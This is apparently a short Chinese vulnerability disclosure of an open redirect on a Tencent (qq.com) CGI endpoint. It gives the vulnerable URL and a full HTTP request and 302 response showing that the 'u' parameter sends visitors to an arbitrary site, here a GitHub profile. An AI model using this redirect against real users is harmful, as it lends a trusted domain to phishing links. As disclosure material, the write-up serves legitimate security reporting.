0x01 漏洞地址
http://htdata2.qq.com/cgi-bin/httpconn?htcmd=0x6ff0080&u=https://github.com/pmiaowu&wd=&eqid=c1558f51000079ee0000000555c103aa
0x02 跳转请求包
# Request:
GET http://htdata2.qq.com/cgi-bin/httpconn?htcmd=0x6ff0080&u=https://github.com/pmiaowu&wd=&eqid=c1558f51000079ee0000000555c103aa HTTP/1.1
Host: htdata2.qq.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: 不给你
# Response:
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html
Server: QZHTTP-2.37.5
Location: https://github.com/pmiaowu
Content-Length: 26
<html><body></body></html>